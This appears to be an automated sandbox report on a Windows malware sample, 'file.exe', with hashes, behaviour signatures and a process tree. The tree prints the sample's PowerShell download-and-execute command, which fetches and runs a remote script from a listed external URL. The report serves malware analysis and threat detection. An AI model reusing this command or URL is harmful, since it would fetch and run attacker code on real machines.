Analysis

  • max time kernel
    153s
  • max time network
    164s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/11/2022, 09:29

General

  • Target

    file.exe

  • Size

    119KB

  • MD5

    5ad4cb63866d6502bf51970f7fab4013

  • SHA1

    06df9e6e396a6db1c85d4a95aa349bc8120e24ba

  • SHA256

    2e8fb9fd2065203501a8eab1759bbf0d64b54f887827b9a6b5bf9fe02d95dc8c

  • SHA512

    c5d978d3a46aed084fe0ff8e35954e72c34ac30a10ca6903b6983b57a13008a1dad23455dac1d56b1d87207fb052373060686bcf7a3b9c89e72c14601675352f

  • SSDEEP

    3072:zclqrchvLHuvYlEOwqSnvcuz060HARqcpyDRD27H:zuqr09h2vc5NEH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://thetechdevelopers.com/wp-content/config_20.ps1

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:740
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://thetechdevelopers.com/wp-content/config_20.ps1')"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3368
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -command IEX(New-Object Net.Webclient).DownloadString('https://thetechdevelopers.com/wp-content/config_20.ps1')
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4720

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4720-134-0x000002DBFD1F0000-0x000002DBFD212000-memory.dmp

    Filesize

    136KB

  • memory/4720-135-0x00007FFEC88D0000-0x00007FFEC9391000-memory.dmp

    Filesize

    10.8MB

  • memory/4720-136-0x00007FFEC88D0000-0x00007FFEC9391000-memory.dmp

    Filesize

    10.8MB